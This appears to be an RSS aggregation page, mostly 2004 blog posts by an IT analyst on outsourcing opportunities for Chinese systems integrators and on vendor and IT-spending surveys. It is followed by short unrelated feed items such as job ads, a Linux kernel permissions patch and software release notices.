> Japan IT Outsourcing 2004-2008 Forecast: IDC (might be a worthwhile purchase, especially for the Dalian-based systems integrators)
> The Power of No (Linux as a bargaining tool <see my Furl comments, too>; make Microsoft shake in their boots!!)
> Web Design Practices (a good reference site)
and many, many more ...
David Scott Lewis
President & Principal Analyst
IT E-Strategies, Inc.
Menlo Park, CA & Qingdao, China
http://www.itestrategies.com (current blog postings optimized for MSIE6.x)
http://tinyurl.com/2r3pa (access to blog content archives in China)
http://tinyurl.com/2azkh (current blog postings for viewing in other browsers and for access to blog content archives in the US & ROW)
http://tinyurl.com/2hg2e (AvantGo channel)
To automatically subscribe click on http://tinyurl.com/388yf .

          [news] "2004 State of Application Development"        
Friday, August 13, 2004
Dateline: China
Special issues of journals and magazines are often quite good -- if you're into the subject matter.  But the current issue of VARBusiness is absolutely SUPERB!!  EVERY SYSTEMS INTEGRATOR SHOULD READ IT ASAP -- STOP WHAT YOU'RE DOING AND READ THIS ISSUE!!  (Or, at the very least, read the excerpts which follow.)  See http://tinyurl.com/6smzu .  They even have the survey results to 36 questions ranging from change in project scope to preferred verticals.  In this posting, I'm going to comment on excerpts from this issue.  My comments are in blue.  Bolded excerpted items are MY emphasis.
The lead article and cover story is titled, "The App-Dev Revolution."  "Of the solution providers we surveyed, 72 percent say they currently develop custom applications or tailor packaged software for their customers. Nearly half (45 percent) of their 2003 revenues came from these app-dev projects, and nearly two-thirds of them expect the app-dev portion of total revenue to increase during the next 12 months."  I view this as good news for China's SIs; from what I've observed, many SIs in China would be a good fit for SIs in the U.S. looking for partners to help lower their development costs.  "By necessity, today's solution providers are becoming nimbler in the software work they do, designing and developing targeted projects like those that solve regulatory compliance demands, such as HIPAA, or crafting wireless applications that let doctors and nurses stay connected while they roam hospital halls."  Have a niche; don't try to be everything to everyone.  "Nine in 10 of survey respondents said their average app-dev projects are completed in less than a year now, with the smallest companies (those with less than $1 million in revenue) finishing up in the quickest time, three months, on average."  Need for speed.  "The need to get the job done faster for quick ROI might explain the growing popularity of Microsoft's .Net framework and tools.  In our survey, 53 percent of VARs said they had developed a .Net application in the past 12 months, and 66 percent of them expect to do so in the coming 12 months."  My Microsoft build-to-their-stack strategy.  "Some of the hottest project areas they report this year include application integration, which 69 percent of VARs with between $10 million or more in revenue pinned as their busiest area.  Other top development projects center around e-commerce applications, CRM, business-intelligence solutions, enterprisewide portals and ERP, ..."  How many times have I said this?    "At the same time, VARs in significant numbers are tapping open-source tools and exploiting Web services and XML to help cut down on expensive software-integration work; in effect, acknowledging that application development needs to be more cost-conscious and, thus, take advantage of open standards and reusable components.  Our survey found that 32 percent of VARs had developed applications on Linux in the past six months, while 46 percent of them said they plan to do so in the next six months.  The other open-source technologies they are using today run the gamut from databases and development tools to application servers."  I guess there's really an open source strategy.  I come down hard on open source for one simple reason:  I believe that SIs in China could get more sub-contracting business from a build-to-a-stack strategy.  And building to the open source stack isn't building to a stack at all!!  "As a business, it has many points of entry and areas of specialization.  Our survey participants first arrived in the world of app dev in a variety of ways, from bidding on app-dev projects (45 percent) to partnering with more experienced developers and VARs (28 percent) to hiring more development personnel (31 percent)."  For SIs in China, simply responding to end-user RFQs is kind of silly.  Better to partner on a sub-contracting basis.  "According to our State of Application Development survey, health care (36 percent), retail (31 percent) and manufacturing (30 percent) ranked as the most popular vertical industries for which respondents are building custom applications.  Broken down further, among VARs with less than $1 million in total sales, retail scored highest, while health care topped the list of midrange to large solution providers."  Because of regulatory issues, I'm not so keen on health care.  I'd go with manufacturing followed by retail.  My $ .02.  "When it comes to partnering with the major platform vendors, Microsoft comes out the hands-on winner among ISVs and other development shops.  A whopping 76 percent of developers in our survey favored the Microsoft camp.  Their level of devotion was evenly divided among small, midsize and large VARs who partner with Microsoft to develop and deliver their application solutions.  By contrast, the next closest vendor is IBM, with whom one in four VARs said they partner.  Perhaps unsurprisingly, the IBM percentages were higher among the large VAR category (those with sales of $10 million or more), with 42 percent of their partners coming from that corporate demographic.  Only 16 percent of smaller VARs partner with IBM, according to the survey.  The same goes for Oracle: One-quarter of survey respondents reported partnering with the Redwood Shores, Calif.-based company, with 47 percent of them falling in the large VAR category.  On the deployment side, half of the developers surveyed picked Windows Server 2003/.Net as the primary platform to deliver their applications, while IBM's WebSphere application server was the choice for 7 percent of respondents.  BEA's WebLogic grabbed 4 percent, and Oracle's 9i application server 3 percent of those VARs who said they use these app servers as their primary deployment vehicle."  Microsoft, Microsoft, Microsoft.  Need I say more?  See http://tinyurl.com/45z94 .
The next article is on open source.  "Want a world-class database with all the bells and whistles for a fraction of what IBM or Oracle want?  There's MySQL.  How about a compelling alternative to WebSphere or WebLogic?  Think JBoss.  These are, obviously, the best-known examples of the second generation of open-source software companies following in the footsteps of Apache, Linux and other software initiatives, but there are far more alternatives than these.  Consider Zope, a content-management system downloaded tens of thousands of times per month free of charge, according to Zope CEO Rob Page.  Some believe Zope and applications built with Zope are better than the commercial alternative they threaten to put out of business, Documentum.  Zope is also often used to help build additional open-source applications.  One such example is Plone, an open-source information-management system.  What began as a fledgling movement at the end of the past decade and later became known as building around the "LAMP stack" (LAMP is an acronym that stands for Linux, Apache, MySQL and PHP or Perl) has exploded to virtually all categories of software.  That includes security, where SpamAssassin is battling spam and Symantec, too.  Popular?  Well, it has now become an Apache Software Foundation official project.  The use of open source is so widespread that the percentage of solution providers who say they partner with MySQL nearly equals the percentage who say they partner with Oracle"23 percent to 25 percent, respectively.There are plenty of choices for those SIs willing to play the open source game.  See http://tinyurl.com/4e3c7 .
"It's all about integration" follows.  "There are many reasons for the surge in application-development projects (the recent slowdown in software spending notwithstanding).  For one, many projects that were put on hold when the downturn hit a few years ago are now back in play.  That includes enterprise-portal projects, supply-chain automation efforts, various e-commerce endeavors and the integration of disparate business systems."  Choose carefully, however.  Balance this data with other data.  Right now, I see a lot more play with portals and EAI.  "Indeed, the need for quality and timely information is a key driver of investments in application-integration initiatives and the implementation of database and business-intelligence software and portals.  A healthy majority of solution providers say application integration is a key component of the IT solutions they are deploying for customers.  According to our application-development survey, 60 percent say their projects involved integrating disparate applications and systems during the past 12 months."  "Some customers are moving beyond enterprise-application integration to more standards-based services-oriented architectures (SOAs).  SOAs are a key building block that CIOs are looking to build across their enterprises."  Anyone who regularly reads any one of my three IT-related blogs knows that I'm gung-ho on SOAs.  "Even if your customers are not looking for an SOA, integrating different systems is clearly the order of the day.  To wit, even those partners that say enterprise portals or e-business applications account for the bulk of their business note that the integration component is key."  Yes, integration, integration, integration.  I'll be saying this next year, too.  And the year after ...  "Another way to stay on top of the competition is to participate in beta programs."  Absolutely true -- and a good strategy, too.  See http://tinyurl.com/6x2gg .
The next article is on utility computing versus packaged softwareAgain, if you read what I write, you know that I'm also gung-ho on utility computing.  "According to VARBusiness' survey of application developers, more than 66 percent of the applications created currently reside with the customer, while 22 percent of applications deployed are hosted by the VAR.  And a little more than 12 percent of applications developed are being hosted by a third party.   Where services have made their biggest inroads as an alternative to software is in applications that help companies manage their customer and sales information.The article goes on to state that apps that are not mission-critical have the best chance in the utility computing space.  Time will tell.  Take note, however, that these are often the apps that will most likely be outsourced to partners in China.  "Simply creating services from scratch and then shopping them around isn't the only way to break into this area.  NewView Consulting is expanding its services business by starting with the client and working backward.  The Porter, Ind.-based security consultant takes whatever technology clients have and develops services for them based on need."   And focus on services businesses and .NET, too.  "Most application developers agree that services revenue will continue to climb for the next year or two before they plateau, resulting in a 50-50 or 60-40 services-to-software mix for the typical developer.  The reason for this is that while applications such as CRM are ideally suited to services-based delivery, there are still plenty of other applications that companies would prefer to keep in-house and that are often dependent on the whims of a particular company."  Still, such a split shows a phenomenal rise in the importance of utility computing offerings.  See http://tinyurl.com/54blv .
Next up:  Microsoft wants you!!  (Replace the image of Uncle Sam with the image of Bill Gates!!)  Actually, the article isn't specifically about Microsoft.  "Microsoft is rounding up as many partners as it can and is bolstering them with support to increase software sales.  The attitude is: Here's our platform; go write and prosper.  IBM's strategy, meanwhile, is strikingly different.  While it, too, has created relationships with tens of thousands of ISVs over recent years,  IBM prefers to handpick a relatively select group, numbering approximately 1,000, and develop a hand-holding sales and marketing approach with them in a follow-through, go-to-market strategy."  Both are viable strategies, but NOT both at the same time!!  "To be sure, the results of VARBusiness' 2004 State of Application Development survey indicates that Microsoft's strategy makes it the No. 1 go-to platform vendor among the 472 application developers participating in the survey.  In fact, more than seven out of 10 (76 percent) said they were partnering with Microsoft to deliver custom applications for their clients.  That number is nearly three times the percentage of application developers (26 percent) who said they were working with IBM ..."  Percentages as follows:  Microsoft, 76%; IBM, 26%; Oracle, 25%; MySQL, 23%; Red Hat, 17%; Sun, 16%; Novell, 11%; BEA, 9%.  I said BOTH, NOT ALL.  Think Microsoft and IBM.  However, a Java strategy could be BOTH a Sun AND IBM strategy (and even a BEA strategy).  See http://tinyurl.com/68grf .
There was another article I liked called, "How to Team With A Vendor," although it's not part of the app-dev special section per se.  This posting is too long, so I'll either save it for later or now note that it has been urled.  See http://www.furl.net/item.jsp?id=680282 .  Also a kind of funny article on turning an Xbox into a Linux PC.  See http://tinyurl.com/4mhn6 .  See also http://www.xbox-linux.org .
Quick note:  I'll be in SH and HZ most of next week, so I may not publish again until the week of the 23rd.
David Scott Lewis
President & Principal Analyst
IT E-Strategies, Inc.
Menlo Park, CA & Qingdao, China
http://www.itestrategies.com (current blog postings optimized for MSIE6.x)
http://tinyurl.com/2r3pa (access to blog content archives in China)
http://tinyurl.com/2azkh (current blog postings for viewing in other browsers and for access to blog content archives in the US & ROW)
http://tinyurl.com/2hg2e (AvantGo channel)
To automatically subscribe click on http://tinyurl.com/388yf .

          [urls] Build a Better Enterprise Application        
Thursday, August 12, 2004
Dateline: China
The following is a sampling of my top ten "urls" for the past week or so.  By signing up with Furl (it's free), anyone can subscribe to an e-mail feed of ALL my urls (about 100-250 per week) -- AND limit by subject (e.g., ITO) and/or rating (e.g., articles rated "Very Good" or "Excellent").  It's also possible to receive new urls as an RSS feed.  However, if you'd like to receive a daily feed of my urls but do NOT want to sign up with Furl, I can manually add your name to my daily Furl distribution list.  (And if you want off, I'll promptly remove your e-mail address.)
Top Honors:
* Build a Better Enterprise Application (on Web services and SOA; great review of all the pertinent issues)
Other best new selections (in no particular order):
* Adaptive Document Layout via Manifold Content (PDF) (another hit for Microsoft, this article proposes a user interface for authoring and editing Web content for different form factors; think formatting for ubiquitous devices and pervasive computing)
A New View on Intelligence (on XML & EII, et al) (thoroughly enjoyable -- so good,  I almost blogged it; insightful perspective)
InfoWorld Special Report: Has desktop Linux come of age? (IMHO, a resounding "No!!"  But there are other perspectives worth considering.  I still think it's a lot of wishful thinking.)
* Negotiating in Service-Oriented Environments (PDF) (A slightly annotated excerpt: "The concept of delivering software as a service is relatively simply: 'do not buy software, simply use it as and when you need it'.  Putting such a concept into practice, however, is far more complex and involves many issues.  In this article, we address the question: What are the characteristics of a market for software services?"  Hot topic, good paper.)
* Real Time Means Real Change (so much talk about the so-called "Real Time Enterprise"; this article takes a look at the realities behind the hype of the "RTE")
Information Scent on the Web (PDF) (Courtesy of PARC, you need to read this for yourself; Google as The Matrix idea -- worse yet, The Time Machine Reloaded   In reality, useful perspectives for Web designers.)
Offshoring/Outsourcing: Fragile - Handle With Care (a brief but rather comprehensive overview; points to the various aspects of ITO and BPO along the IT value chain)
IT Spending For Comprehensive Compliance (original article linked; good review of the various opportunities "thanks" mostly to SOX)
* The Executive's Guide to Utility Computing - ROI of Utility Computing (a broad perspective on utility computing, different from what is usually published)
Examples of urls that didn't make my "Top Ten List":
> Benchmarking Study Shows 75 Percent of Enterprises Deploying Web Services (need I say more?; includes stats on ebXML and grid computing, too)
> Probabilistic Model for Contextual Retrieval (PDF) (a sneak peek at Microsoft's emerging search technology?)  See also Block-based Web Search, courtesy of Microsoft Research Asia (Beijing) and Tsinghua University, arguably China's best (the latter article is not urled; from the recent SIGIR conference).  If you think Google is the last word in search, think again.
> Where To Find New Growth Prospects And What Challenges Need To Be Overcome (necessary action items and preferred geographic regions; China <not Russia, Brazil or the Czech Republic> comes in the number two slot after North America)
> CIO Magazine: Are We Happy Yet? (on ITO and BPO) (dumb article title, but smart content; good metrics to consider, including a take on SLAs)
> Developing Killer Apps for Industrial Augmented Reality (restricted access) (this page provides some complimentary information to the restricted access selection, although it's not urled).  I just noticed something:  The apps section of IEEE CG&A is edited by two mil guys, one from the (U.S.) Office of Naval Research and the other from the U.S. Army simulation and training office.  Hey, who says all the good engineering jobs are outsourced!?    Frankly, I believe that the best American engineers can always find jobs within DoD or the intelligence community.  Besides, they do all the truly fun computing stuff!!  Trust me, there isn't so much fun stuff done at Oracle.
and many, many more ...
David Scott Lewis
President & Principal Analyst
IT E-Strategies, Inc.
Menlo Park, CA & Qingdao, China
http://www.itestrategies.com (current blog postings optimized for MSIE6.x)
http://tinyurl.com/2r3pa (access to blog content archives in China)
http://tinyurl.com/2azkh (current blog postings for viewing in other browsers and for access to blog content archives in the US & ROW)
http://tinyurl.com/2hg2e (AvantGo channel)
To automatically subscribe click on http://tinyurl.com/388yf .

          [news] IT Spending Trends        
Tuesday, July 6, 2004
Dateline: China
A quick recap on IT spending trends from three recently published Smith Barney surveys.  The three reports are the May and June editions of their CIO Vendor Preference Survey and the 6 June issue of softwareWEEK.  Tom Berquist, my favorite i-banking analyst, was the lead for all three reports.  I have a backlog of blogs to write, so I'll use as many quotes as possible and add context where necessary.  (I'm mostly extracting from my smartphone bookmarks for these reports.  Warning:  I may have coded the May and June issues incorrectly, but the quotes are correct.)  NOTE:  Highlighted items (e.g., items in bold, like this sentence) are MY emphasis.  Items in red are my commentary.
Starting with the Survey editions, "(t)he strongest areas of spending appear to be software (apps, security, storage, and database) and network equipment/apps (Gigabit Ethernet, WLAN, VPNs)" and regarding software, "larger and more well known vendors continue to dominate the list in each category with vendors such as Microsoft, SAP, IBM, Veritas, Symantec and Computer Associates getting significantly more mentions in each of their groups than the remaining vendors did."  However, the report admits that their sample group might be biased.  Yes, vendors matter -- and so do vendor partnering strategies.  However, I'm a bit skeptical about CA and I don't particular care very much for Veritas or Symantec.  Not my part of the universe.
"Applications again stand out as a clear area of strength."  "Within applications, Enterprise Resource Planning (ERP), Supply Chain Management (SCM), Customer Relationship Management (CRM) and Business Intelligence (BI) all showed extremely well ..."  Well, this is the first sign that a recovery may be in the making for SCM.  However, I'd emphasize BI and ERP, followed by CRM; don't count on a lot happening in the SCM space just yet.  Some other key surveys do NOT validate that SCM is in recovery.  "In terms of specific vendors, Microsoft, Symantec, Veritas, SAP, and Adobe were the top beneficiaries of CIOs intentions to increase spending."  The report continues that only SAP showed statistically significant results, both in ERP and SCM.  "Results were more mixed for best-of-breed vendors in this area, suggesting that horizontal applications vendors are having a tough time competing with the large ERP vendors even as vertically-focused vendors continue to have some measure of success on this front."  For the more adventurous SIs in China, SAP presents a lot of opportunities.  Tread carefully, though.  And "Adobe's enterprise strategy appears to be gaining momentum.  Adobe was a clear standout in content management ..."  "Survey results were also positive (though somewhat less so) for other leading content management players, notably Microsoft and IBM."  Another "win" for Microsoft.  Funny that none of the traditionally leading content management players were mentioned.  A take on Linux:  "Linux continues to garner mind share, but large enterprises remain the main adopter.  Interestingly, nearly 83% of our respondents stated that they were not currently moving any applications to Linux.  Of the 17% that said they were moving applications to Linux, only one company under $1.0 billion in revenue was making the transition to Linux confirming our views that Linux is primarily being used by large companies to shift Unix applications to Linux on Intel."
"Among CIOs who indicated a higher level of consulting spend, IBM was the clear winner, followed by Accenture as a distant second.  Unisys was also mentioned as a vendor being considered, but it was a distant third.  However, we note that Unisys being mentioned ahead of a pure-play consultant like BearingPoint (a low number of mentions, which included mentions of decreased spending) or EDS is positive, given that Unisys chooses to focus in 2 specific verticals, including one-public sector-that was not in the survey."  "Over two-thirds of CIOs indicated that they do not use IT outsourcers.  Most of the rest said they were unlikely to change the level of outsourcing spend.  IBM, ACS and CSC were the only vendors explicitly mentioned as likely to get more outsourcing business."  The "two-thirds" figure will likely change in favor of outsourcing.  This trend is fairly clear.  See a BCG report at http://tinyurl.com/2muy8 , although the report takes a relatively broad perspective.
From softwareWEEK, "(t)he CIOs were also very focused on rapid 'time to market' with purchases.  None were interested in starting projects that would take greater than 2 quarters to complete."  "This requirement was not a 'payback' requirement, but rather an implementation time frame requirement.  The CIOs did recognize that payback times could be longer, though the payback times on IT utility spending were much shorter than on applications or emerging area spending."
"In terms of spending, the CIOs all used a similar methodology for making decisions that essentially divides their IT spending into one of three categories: 1) sustained spending on their 'IT utility' (i.e., infrastructure such as network equipment, servers, storage, databases, etc.); 2) new project spending on applications (business intelligence, portals, CRM, etc.); and 3) investment spending on select emerging areas (grid/utility computing, identity management, collaboration, etc.)  It was pretty obvious that the CIOs recognized that business unit managers were more interested in spending on new applications/emerging areas than on the IT utility ..."  "(S)ome of the CIOs were experimenting with grid/utility computing initiatives to try to increase their utilization of storage/servers and reduce the amount of new equipment to be purchased.  In one example, a CIO showed their storage/server utilization around the world and many regions were in the 50% or worse bucket for average utilization.  Their goal was to use grid computing architectures and storage area networks (along with faster communication links) to better share the pool of resources."  Yes, this is it!!  Take this to heart!!  If you think grid and utility computing are Star Trek stuff, think again.
"In terms of new projects, the CIOs mentioned they were spending on business intelligence, portal/self-service applications, CRM, and collaboration.  Collaboration was a heated discussion, with all CIOs commenting that this was a big problem for them and there was no clear solution on the market.  While it wasn't completely clear to the audience what the CIOs were looking for in a collaboration solution, the elements that were described included: more intelligent email, corporate instant messaging, web conferencing, integrated voice over IP with instant messaging (so that a conversation could quickly shift from typing to talking), and collaborative document editing (spreadsheets, presentations, publications, etc.).  Within the business intelligence arena, business activity monitoring was discussed as was building of enterprise data warehouses/data marts.  The portal/self-service applications being built or deployed were primarily for customer and employee self-service (remote access to email, applications, and files was a big deal for all of the companies).  On the CRM front, the discussion from one CIO was around their need to increase revenues and manage channel conflict better."  [I'll be posting to this blog a bit more about collaboration opportunities over the next week.]
"While vendors were not discussed in any detail during the panel, the CIOs did say that they remain open to working with smaller vendors (public and private) as long as they have plenty of relevant references (in their industry, particularly with close competitors) and they offer a compelling value proposition versus larger vendors.  One CIO stated that they get called by 20 startups a week to sell products to them, but most of them cannot articulate the value proposition of their product.  Nonetheless, the CIO does take 5 meetings a month from startups because some of them are working on things that are interesting to the business."
Whew ...  Lots of good materials.  To reiterate, all highlighted items are my emphasis.  Bottom line:  The market is heating up.  Get your ISV relationships in place.  Pick your verticals (see the "Tidbit on Microsoft" which follows).  Pick your apps -- and the apps I like the best are content management and BI, although ERP is looking good, too.  Collaboration can be a major source of revenue if the SI can provide a truly effective solution.
Tidbits on Microsoft
A quick update on some happenings in the Redmond universe.  (See http://tinyurl.com/36xgu ; the article is titled, "Microsoft focuses on its enterprise-applications business".)  First, app areas that are of particular interest to MS include those for manufacturing and life sciences.  So, how about a MS build-to-their-stack strategy focused on either of these two verticals?  Second, MS is moving beyond purely horizontal offerings to very specific functionality.  Their Encore acquisition is an example of MS moving in this direction.  Finally, new releases of all four of Microsoft's ERP product lines are due for this year.  Not surprisingly, MBS marketing is up 20% from FY04.  Hmmm ... ERP spending intentions are strong and MS is a key player in this space -- with several updated offerings scheduled for release this year.  Another opportunity?
Tidbits on Infosys
Infosys formally enters the IT strategy consulting biz.  (See http://tinyurl.com/2xxlo .)  Yes, it was inevitable.  In April Infosys Consulting, Inc. was formed and, "(i)t's no secret that the winning model will be high-end business consulting combined with high-quality, low-cost technology delivery done offshore," according to Stephen Pratt, the head of Infosys' consulting unit.  The Infosys Consulting unit now has 150 employees in the States and plans to expand to 500 within three years.  Note to SIs in China:  You need more -- a lot more -- IT strategy types  And you need people in the States (at least on an "as needed" basis) in order to capture -- and serve -- new accounts.
David Scott Lewis
President & Principal Analyst
IT E-Strategies, Inc.
Menlo Park, CA & Qingdao, China
http://www.itestrategies.com (current blog postings optimized for MSIE6.x)
http://tinyurl.com/2r3pa (access to blog content archives in China)
http://tinyurl.com/2azkh (current blog postings for viewing in other browsers and for access to blog content archives in the US & ROW)
http://tinyurl.com/2hg2e (AvantGo channel)
To automatically subscribe click on http://tinyurl.com/388yf .

          Paradigm Shift with Edge Intelligence        
In my Internet of Things keynote at LinuxCon 2014 in Chicago last week, I touched upon a new trend: the rise of a new kind of utility or service model, the so-called IoT specific service provider model, or IoT SP for short. I had a recent conversation with a team of physicists at the Large Hadron […]
          In Search of The First Transaction        
At the height of an eventful week – Cloud and IoT developments, Open Source Think Tank,  Linux Foundation Summit – I learned about the fate of my fellow alumnus, an upperclassman as it were, the brilliant open source developer and crypto genius known for the first transaction on Bitcoin. Hal Finney is a Caltech graduate who went […]
          Top 15 Nokia N9 Apps        
Nokia N9 is one of the most beautiful devices Nokia has ever made. The shape, its body – every aspect of the phone speaks out how much Nokia has put into the phone. The new (not so new now) Nokia N9 is an elegant device that runs on Meego, a Linux-based Operating System, which Nokia […]
          Disable Addon Compatibility Check in Firefox 7.0a1 Nightly Build        
.Firefox 7.0 Alpha 1 (nightly build) is now available for download for Windows, Mac and Linux. You can download the latest build as the Mozilla team works on it and regularly updates the nightly build daily. Firefox 5.0 was also just released yesterday for download. Those of you trying to use Firefox 7.0a1 will be […]
          Ingénieur Unix / Linux Expérimenté H/F - Aduneo - Malakoff        
Ingénieur Unix Linux messagerie Nous recrutons en CDI pour intervenir chez nos clients grands comptes, un ingénieur systèmes UNIX LINUX Vous serez rattaché à notre direction technique pour réaliser des projets en mode forfait dans nos locaux de Malakoff (près du métro ligne 13), Ou chez nos clients basés en Ile de France. Vous participerez à des projets de mise en oeuvre, d'administration et de sécurisation d'architectures Unix. Compétences techniques souhaitées : ...
          Administrateur Systemes Linux / Windows- Secteur Bancaire (H-F) - Alten - Boulogne-Billancourt        
Descriptif du projet Pour renforcer nos équipes, nous recherchons des profils administrateurs système linux, de tous niveaux d'expérience, pour travailler sur des plateformes de service en production, sur des serveurs physiques comme virtualisés de grande envergure. Vous devrez : Maîtriser la solution technique, Résoudre les dysfonctionnements complexes (Support N2-N3) Intégrer, tester, déployer les évolutions nécessaires et proposer des axes d'améliorations pour bonifier le...
          ingénieur système Windows/ Lunix (H/F) - Umantic - Saint Denis        
INGENIEUR SYSTEMES Windows/linux. Pour le compte d'un de nos clients, opérateur dans le domaine ferroviaire, vous aurez à mettre en place et maintenir des logiciels liés et leurs systèmes d'exploitations associés. L'Equipe dans laquelle vous intervenez intègre dans l'environnement de production les solutions logicielles et en assure le déploiement. Principales missions : Vous intervenez ou assistez le client dans la mise en Å"uvre des logiciels et des...
          Administrateur Système Linux (H/F) - Clémentine International - paris        
Administrateur Système (H/F) Notre client est le premier groupe européen d'agences de voyages en ligne et le cinquième dans le monde. Le groupe représente aussi la plus grande société européenne d'e-commerce. Les différentes marques disposent des meilleures offres sur des vols réguliers, charters et compagnies aériennes lowcost. Elles proposent également d'autres services et produits, tels que des hôtels, de la location de voitures, des séjours packagés ou à composer sur...
          Administrateur système UNIX / Linux (H/F) - ACENSI - Lille        
Dans le cadre du développement de l'agence de Lille et pour répondre aux besoins de l'un de nos clients nous recherchons un administrateur système et réseaux : Vous aurez pour missions : Administration et exploitation des systèmes Open sources (Redhat) Mise en oeuvre de nouvelles plateformes Linux et Windows, en charge du maintien en condition opérationnelle En charge du suivi et de la résolution des incidents de Niveau 2/3 sur l'ensemble des problématiques serveurs. ...
          Ingénieur(e) DevOps intégration continue JENKINS/ANSIBLE - DAVIDSON CONSULTING - Boulogne-billancourt        
Au sein de l'équipe industrialisation et architecture, vous aurez pour missions : La maintenance et la mise en place des playbook Ansible « Automatiser les livraisons » L'installation et la maintenance des outils de l'intégration continue et du déploiement continu L'installation et la configuration des EC2/AMI (AWS) L'installation et la configuration des conteneurs (DOCKER) L'administration système linux Le développement de scripts shell La gestion des...
          Ingénieur DevOps (H/F) - Oxiane - Paris intra-muros et petite couronne         
Nous recherchons un Ingénieur DevOps et Intégration continue Rejoignez- notre équipe Factory Profil Compétences - Expérience Diplômé d'un Bac +4/5 en Informatique Compétences en développement (quelques années) : vous avez un bagage Java / Java EE solide. Et bien sûr des connaissances "Ops" : Administration de parc informatique (Linux, Windows) Langage de scripting OS : *sh, PowerShell Connaissances Réseaux Outils du DevOps (Infrastructure...
          Ingénieur Système Linux Confirmé - Secteur Télécom H/F - Alten - Paris        
Descriptif du projet Nous recherchons en CDI un Administrateur Système Linux pour intervenir sur des plateformes de service en production sur des serveurs physiques comme virtualités de grande envergure. A ce titre, vos responsabilités seront les suivantes: Maitriser la solution technique ; Résoudre les dysfonctionnements complexes ; Intégrer, tester, déployer les évolutions nécessaires et proposer des axes d'améliorations pour améliorer le fonctionnement de la solution ...
          Ingénieur Administrateur Système linux - Openstack (H/F) - Alten - Toulouse        
Dans le cadre de la transformation numérique globale, nous recherchons: un Ingénieur OpenStack ou Administrateur Linux. Vos principales missions seront les suivantes : Aligner la mise en place d'une plateforme IaaS en accord avec la politique de sécurité ; Proposer des scénarii d'architectures avec une analyse profonde (avantages/inconvénients, budget) ; Définir les élements de l'architecture (serveurs, stockage...) ; Investiguer des problèmes sur des serveurs. Issu(e) d'une...
           ADMINISTRATEUR SYSTEME LINUX (H/F) - Secteur Industrie - Alten - TOULOUSE        
Descriptif du projet Intégrez au sein des équipes projets, vos missions seront : Maitriser la solution technique Résoudre les dysfonctionnements complexes Intégrer, tester, déployer les évolutions nécessaires et proposer des axes d'améliorations pour améliorer le fonctionnement de la solution Contribuer à l'amélioration des méthodes de travail Contribuer aux déploiements des nouvelles solutions techniques Profil recherché Diplômé(e) d'une école d'ingénieurs ou...
          Ingénieur intégration et validation H/F - ALTIM Consulting - Boulogne-Billancourt        
Qui êtes-vous ? Vous êtes issu(e) d'une formation d'ingénieur en informatique ? Vous justifiez d'une expérience de 3 ans sur un poste d'intégration (ou stages significatifs) avec des compétences dans le développement d'applications embarquées (Linux, Makefile, Buildroot / Yocto, C/C++, Bash, Perl, Python) ? Vous êtes autonome, rigoureux, vous avez la capacité de travailler en équipe et vous avez un esprit de synthèse. Ce que nous pouvons accomplir ensemble ? ...
          Ingénieur Linux embarqué H/F - ALTIM Consulting - Boulogne-Billancourt        
Qui sommes-nous ? ALTIM, Cabinet d'expertise en forte croissance dans le développement de logiciels embarqués, secteurs TV numérique, Automobile et Santé, recherche des Ingénieurs Linux embarqué (H/F). Qui êtes-vous ? De formation Bac +5 (Universitaire ou Ecole d'ingénieur), vous justifiez d'une ou plusieurs expériences significatives sur des projets intégrant du soft embarqué (C/C++), drivers linux, kernel android, java embarqué et/ou yocto. Ce que nous pouvons...
          Comentário sobre Windows desatualizado está presente em mais de 8 milhões de PCs brasileiros por Wesley Francis        
Esquema é dualboot de Windows e alguma distro Linux estável e ter o melhor dos dois mundos.
          [PATCH 0966/1285] Replace numeric parameter like 0444 with macro (no replies)        
I find that the developers often just specified the numeric value
when calling a macro which is defined with a parameter for access permission.
As we know, these numeric value for access permission have had the corresponding macro,
and that using macro can improve the robustness and readability of the code,
thus, I suggest replacing the numeric parameter with the macro.

Signed-off-by: Chuansheng Liu <chuansheng.liu@intel.com>
Signed-off-by: Baole Ni <baolex.ni@intel.com>
drivers/tty/n_gsm.c | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/drivers/tty/n_gsm.c b/drivers/tty/n_gsm.c
index 54cab59..4f25fd9 100644
--- a/drivers/tty/n_gsm.c
+++ b/drivers/tty/n_gsm.c
@@ -64,7 +64,7 @@
#include <linux/gsmmux.h>

static int debug;
-module_param(debug, int, 0600);
+module_param(debug, int, S_IRUSR | S_IWUSR);

/* Defaults: these are from the specification */

          Netpeak Spider — продвинутый инструмент для SEO анализа сайтов        

Здравствуйте, уважаемые читатели блога Goldbusinessnet.com. Сегодня я хотел бы предложить вам обзор одного из инструментов сервиса Netpeak Software — Netpeak Spider, который может оказаться полезным при анализе и выявлении ошибок, препятствующих успешному продвижению сайта. Правда, данное ПО адаптировано пока лишь для Windows, но, насколько я знаю, разработка для Linux и Mac OS идет полным ходом.

В сети немало аналитических ресурсов подобного направления, которые позволяют производить проверку страниц в онлайн режиме на их соответствие необходимым нормам SEO. Однако, применение программы Netpeak Spider позволяет произвести анализ скрупулезно и получить более качественные результаты.

Сразу скажу, что получить Спайдер в свое пользование удовольствие платное, поэтому, возможно, начинающим вебмастерам будет сложно сразу потратить свои кровные на активацию и продление лицензии. Однако, владельцам коммерческих ресурсов и сеошникам этот софт может оказать услугу и в перспективе с лихвой вернуть вложенные средства. Ну а теперь самое время узнать поподробнее о нашем герое.


          BibleDesktop 1.0.7        

BibleDesktop, the portable JSword-based Bible study tool, for Windows, Macintosh and Linux, now supports Parallel Bibles. And as an added bonus, you can visually compare 2 or more Bibles of the same language. See the JSword Change Log for more details and other improvements.

You can download it from here.
          BibleDesktop 1.0.6        

Happy Easter!

BibleDesktop, the portable JSword-based Bible study tool, for Windows, Macintosh and Linux, has been improved!!! This release completes our support for all Sword modules, except Personal Commentary. See the JSword Change Log for more details.

You can download it from here.
          Work at Home West Coast Region Associate Technical Support Engineer        
Security software company is filling a position for a Work at Home West Coast Region Associate Technical Support Engineer. Core Responsibilities Include: Tracking and monitoring assigned support cases to ensure timely resolution and follow-up Fielding queries via phone, email and web portal of the CRM solution Representing the customer to ensure serviceability and product quality issues are being tracked, prioritized, resolved, and incorporated into the product release cycle Skills and Requirements Include: 1+ year's relevant experience supporting a distributed software technology in a Windows, Mac, and Linux environment, ideally an agent based product Demonstrated prior success exceeding customer expectations in a technical support capacity Excellent Customer Service skills
          Kali Linux | Rebirth of BackTrack, the Penetration Testing Distribution.        
